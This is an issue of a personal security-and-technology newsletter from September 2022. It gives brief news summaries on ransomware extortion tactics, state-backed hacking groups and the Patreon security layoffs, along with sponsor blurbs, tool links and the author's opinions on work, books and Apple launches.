Unsupervised Learning Newsletter NO. 348

News & Analysis

Spearmishing, Patreon Security, and Triple-Threat Ransomware
🗞️ NO. 348 | SEP 12 2022

Let's have a fantastic week.


Patreon Security
Patreon laid off its security team last week, and a former privacy engineer there, Emily Metcalfe, there said she wouldn't trust her data there. Big yikes. Patreon came out saying it was just five people laid off, and that the majority of security personnel remain in place, but another anonymous internal report said there was nobody left qualified to run the tools. Regardless of how bad it actually is (which only people inside know), you can be sure there's something amiss when security people are willing to publicly shit-talk you on the internet after being let go. MORE

Not Just Ransomware
The LockBit ransomware group is using combined extortion tactics to go after victims. We all know ransomware groups encrypt files and demand money to decrypt them: that's tactic 1. They also threaten to release the data that they stole before they encrypted it. That's tactic 2. And finally they are now adding DDoS to the mix. So they (and other groups are combining tactics in this way) can stop you from using your data, threaten to embarrass you and create a PR incident, and/or prevent your customers from reaching you. MORE

There's a new attack technique happening where new employees at a company get hit with a malicious text message that says something like, "Hey I'm the CEO of $YOURNEWCOMPANY and I need you to do X for me…" Remember, it's easy to find your phone number on various websites, so once you're associated with a company on LinkedIn you can be targeted. MORE | ANALYSIS BY RACHEL TOBAC


🔭 Benchmark your cloud configuration in minutes with JupiterOne

See how your configuration compares against CIS Foundations benchmarks in just a few clicks. Once integrated with your cloud platform, JupiterOne automatically benchmarks your configuration against CIS best practices, giving you greater understanding of how to improve your configuration and security posture.

NOTE: I just built the Vulnerability Management program at Robinhood using JupiterOne, and it's seriously my top recommendation for any company getting into Attack Surface Management, Asset Management, or Vulnerability Management.

NK Energy Attacks
North Korean APT Lazarus leveraged the VMware Horizon vulnerability to attack the corporate networks of energy companies in the US, Canada, and Japan. Once in they used a RAT called MagicRAT to search for and steal data from systems on the network. MORE | MAGICRAT ANALYSIS

Axie Recovery
The US has recovered $30 million stolen from Axie Infinity by North Korea's Lazarus group. Leveraging blockchain analysis expertise by Chainanalasis and the FBI, law enforcement groups were able to seize funds after cashout (not from the blockchain itself). This is yet another reminder that the blockchain doesn't just leave crumbs—it's a crumb-leaving technology—and criminals are often vulnerable at the cashout step. MORE

Government Takedowns?
Cloudflare has clarified why they considered Kiwi Farms so dangerous, and they're calling for governments to determine takedown criteria themselves instead of relying on tech companies to do it for them. I think that makes sense, but in cases like Kiwi Farms it was obvious this was way over the line. It'd be nice to have both, but when government is too slow why not just do the right thing yourself? MORE

Oath Keeper Penetration
The Anti-Defamation League's Center on Extremism (COE) published a report this week on the Oath Keepers organization, which has the stated purpose of getting more members into positions of influence within LEO and government. Specifically, they published research showing how many known members are actually cops, or are in the military, or are either in or are running for public office. MORE | THE COE REPORT

Phosphorus APT
Microsoft is warning about Iranian APT group Phosphorous, which is know to quickly adopt new vulnerabilities into its toolchain. They say the main workflow is to look for internet-facing flaws in Exchange, Fortinet, log4j, to use those to scan the network and collect credentials, and then to establish persistence using scheduled tasks. From there they've been seen asking for an $8,000 ransom around 2 days after digging in. MORE


  • 🪳 HIGH Cisco releases patches for multiple vulnerabilities. MORE


5G Internet
T-Mobile is rolling out 5G internet in 64 cities in the Northeastern US, including NYC, Boston, and Philadelphia. Somewhat related fun fact: I have 5G+ AT&T in my town and when I'm at the bank I consistently get over 650Mbit/second download speeds. That's mobile speed, not wireless, and it's almost as fast as my gigabit wired ethernet at home. MORE

Entangled Clocks
We've entangled two atomic clocks for the first time. MORE


Finland Energy
Finland's use of wind and nuclear will bring them to energy self-sufficiency within 1-2 years. MORE

Astronaut Mutations
Scientists have found mutations in the blood of 14 NASA astronauts that did Space Shuttle missions between 1998 and 2001. Astronauts are exposed to tons of extra radiation because they're outside the protection of Earth's atmosphere for so long. MORE

SF Psychedelics
San Francisco has unanimously decriminalized psychedelics like psilocybin and ayahuasca, making them the 'lowest priorities' for law enforcement. Seems like a formality, though, given how little prosecution there is for much harder drugs. MORE


There Are No Pilots
Evidently, a significant part of airline delays today is due to a lack of pilots. This seems to be exacerbated by pilots being laid off during the pandemic combined with the military training fewer pilots because they're moving to drones. Combine those and you have a massive pipeline problem, and it struck me that the US (and much of the world) seems to have pipeline problems in many fields. Cybersecurity comes to mind. I think a big part of it is that it's not clear whose problem it is. Secondary schools? Universities? Industry? Probably all of the above, but if it's everyone's problem it's nobody's problem. The West seems to have lots of these shared investment problems right now. Entities are too short-term focused and/or angry at the other guy to want to support programs that require investment now to see shared benefit in the future. Meanwhile, China can throw up a 10-story building like a hotdog stand. MORE

Working vs. Working Hard
I'm intensely curious about the conjoined phenomenon around The Great Resignation, Quiet Quitting, and companies going after passive workers. We see this with Back to Office policies as well, where managers can't wait to get people back into an office where they can see them. I find this interesting because I think two things are happening at once. First, I think many companies are so broken that they can't clearly articulate what they're doing. They don't have a clear mission, they can't articulate their goals, and they definitely can't articulate how a given employee's work is helping with those. So it sucks to work there. Now add pandemics, remote work, and rising depression overall, and you have a lot of checked-out employees. Then, on the other hand, you also have a lot of people who look good on paper but who either aren't able or aren't willing to put in work, so they're using all these truths as an excuse to phone it in. So we have two simultaneous realities: crappy work that people should quit, and crappy employees that should be fired. From the business perspective, I think it should be ok to demand employees that are 100% energetic and committed. And to filter for that, both before and after hiring. But at the same time I think, from a market perspective, it makes a company more attractive if they can articulate their vision and story. Not just during onboarding, but constantly. It's a hard time for companies right now. You have to be fluffy enough to be attractive, but they're learning that being too accommodating attracts and retains the wrong kind of people.


We have two Steven Pressfield books assigned for this month's bookclub, but I read like 5 of them. They're short. My absolute favorite so far, besides The War of Art, which I think was the original, was Do The Work. Highly recommended. Read War of Art first, then Do The Work, then Put Your Ass Where Your Heart Wants to Be. GET THE BOOKS

It's Apple Religion season, which means I'll be camping soon. This time it'll be for two Friday mornings in a row: this coming Friday for the iPhone 14 Pro, and next Friday for the Apple Watch Ultra and the new AirPod Pro 2's. I'm most excited by the Ultra watch, actually. I'm not just an Apple guy, but also a watch guy, so I'm really happy with how chunky this one looks, plus the larger, completely flat face! I don't have much religion in my life, so Apple is my replacement for that. I camped for the iPhone in 2007 and haven't missed a launch since! If anyone wants to come make fun of me I'll probably be at my go-to, which is the Burlingame store.

I'm combining the free and member newsletters into a single edition for the time being, and using Mailchimp's Dynamic Content to create content sections that only UL members can see. Creating two versions actually takes significant time and effort, and with this just being me for now I'd rather spend that time on the content itself. Dynamic Content is a decent hybrid, but hopefully with the big UL changes coming soon I'll be able to break those out again, plus have more than just the News & Analysis episode going out to members every week! Cannot wait.

I am building a mobile app around Eudaimonia. Will start a thread about it in UL Slack if anyone is interested in discussing. I have most of the backend logic already built, as well as mockups, and am close to starting developer selection. Let me know if you know any great mobile dev shops that are good with health apps with a major focus on design and aesthetics.

I tweeted out that I got my Omicron booster shot (and flu shot) and got immediately targeted by a disinformation nutjob. What kind exactly? These folks don't just believe Covid is a hoax. That would be too mainstream. No, they believe that all viruses are a hoax. These are doctors, or at least they have significant medical training, and they don't believe in viruses. This was a potent reminder that batshit ideas can easily override any previous logic, education, or training in a vulnerable mind. Don't think knowledge protects people, including yourself.


⚙️ THREAT HUNTING | Sandbox Scryer (⭐️ 60 )
An open-source tool for producing threat hunting and intelligence data from public sandbox detonation output. It leverages the MITRE ATT&CK framework to organize and prioritize findings, assisting in the assembly of IOCs, understanding attack movement, and hunting for threats. TOOL | by Hybrid Analysis

📔 DETECTION ENGINEERING | Threat Hunting Based on Zipf's Law
A brilliant application of Zipf's law, which is normally used in NLP applications, to find anomalies in security-related events. BLOG | by Dmitrijs Trizna

🔭 Benchmark your cloud configuration in minutes with JupiterOne [Sponsor] — See how your configuration compares against CIS Foundations benchmarks in just a few clicks. NOTE: JupiterOne is the no-joke centerpiece of the security program I built at work, and I can't recommend it enough. Ping me if you want to have your ear talked off about it. START WITH A FREE ACCOUNT

Hedonic vs. Eudaimonic Happiness
A good articulation of the two primary types of happiness that people pursue and confuse. MORE

How to Draw Anything
Someone used Stable Diffusion to go from a 10-year-old's crude art concept to a hyper-realistic sci-fi scene. A stunning example of combining a human idea with AI to create a final art product. TUTORIAL

Just Grep
The GNU Grep team is telling us to stop using egrep and fgrep. It's all built into grep now, basically. Just use grep -E and grep -F respectively. MORE

So You Want to Be a Writer
If it doesn't come bursting out of you, don't do it? MORE

OSCP Tips and Tricks MORE

The most regretted (and lowest paying) college majors. MORE

Really looking forward to this Amazon series The Peripheral, based on William Gibson's book. TRAILER

Vulnerability Management for Go MORE


If you're a creative person who struggles with starting and finishing projects, read Do The Work, by Steven Pressfield. GET THE BOOK


"Be cautious, because research can easily become Resistance to getting real work done.”

Steven Pressfield